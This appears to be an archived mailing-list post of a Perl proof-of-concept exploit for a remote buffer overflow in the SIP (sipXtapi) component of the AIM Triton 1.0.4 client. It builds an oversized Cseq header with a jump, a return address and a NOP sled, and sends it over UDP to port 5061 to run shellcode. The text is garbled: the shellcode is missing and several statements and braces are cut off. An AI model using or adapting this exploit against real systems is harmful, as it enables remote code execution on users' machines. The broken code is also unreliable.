[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

AIM Triton 1.0.4 (SipXtapi) Remote Buffer Overflow Exploit (PoC)


# p0c
# Tested on Windows XP SP2 with triton 1.0.4
# c0rrupt -{at}- f34r -{dot}- us
# This exploits the sipxtapi vuln in triton which was patched.. sometime ago..
# The exploit sends a specially crafted udp packet to the triton client
# which leads to command execution through a buffer overflow.
# The Triton client does not open the sipxtapi port 5061 by default.
# The port is open when the client attemps to try any talk session, and stays
# open for the remainder of the time it is running.

use IO::Socket::INET;



# win32_exec -  EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum 
my $shellcode =

if (not $ARGV[0]) 
        print "[+] AIM Triton 1.0.4 (and more) Exploit by c0rrupt [+]\n";
        print "[+] Greetz to n0limit, M03, Brax, raze, DiabloHorn, and everyone 
else [+]\n";
        print "[+] Usage: trionPWN.pl <host> [+]\n";

print "[+] AIM Triton 1.0.4 (and more) Exploit by c0rrupt [+]\n";
print "[+] Greetz to n0limit, M03, Brax, raze, DiabloHorn, and everyone else 

my $cseq = "B"x780 . "\xEB\x0C\x90\x90" . "\xd9\xe7\x01\x40" . "\x90"x500 . 

my $packet =
"INVITE sip:a@xxxxxxxxx:5555 SIP/2.0\r
From: <sip:hello@xxxxxxxxx:5555>;tag=1c32606\r
To: sip:CFB5A74A87D97A19@xxxxxxxxxxxxx:5061\r
Call-Id: 65f65f65d6sexcytv\r
Cseq: $cseq";

print "[+] Packet Generated.. Sending to " . $target . "\n";


print "[+] Attack completed, check your shell.\n";